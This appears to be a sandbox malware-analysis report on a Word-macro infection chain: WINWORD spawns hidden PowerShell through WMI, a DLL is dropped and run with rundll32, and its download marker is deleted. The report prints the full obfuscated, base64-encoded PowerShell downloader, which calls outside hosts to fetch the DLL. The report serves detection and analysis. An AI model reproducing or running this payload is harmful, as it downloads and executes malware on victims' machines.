ACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFAEE117C22 push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_100037FB push ecx; ret

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Ebern\dqxd.zpy

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Ebern\dqxd.zpy:Zone.Identifier read attributes | delete

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\rundll32.exe

